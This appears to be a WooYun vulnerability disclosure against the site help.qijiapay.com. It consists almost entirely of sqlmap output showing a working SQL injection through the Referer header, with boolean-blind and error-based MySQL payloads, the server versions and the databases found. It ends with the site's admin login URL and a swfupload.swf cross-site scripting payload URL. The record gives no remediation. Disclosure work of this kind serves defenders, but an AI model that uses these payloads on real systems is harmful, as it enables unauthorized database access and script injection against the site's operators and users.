WooYun.org

http://help.qijiapay.com

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Referer #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://help.qijiapay.com' RLIKE (SELECT (CASE WHEN (6087=6087) THEN 0x687474703a2f2f68656c702e71696a69617061792e636f6d ELSE 0x28 END)) AND 'nFeD'='nFeD
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://help.qijiapay.com' AND (SELECT 5873 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(5873=5873,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'frjq'='frjq
---
[00:50:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.27, PHP 5.5.31
back-end DBMS: MySQL 5.0

available databases [3]:
[*] information_schema
[*] qeekapay
[*] test

http://help.qijiapay.com/index.php?m=admin&c=index&a=login&pc_hash=1W8D41

http://help.qijiapay.com/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%281%29}}//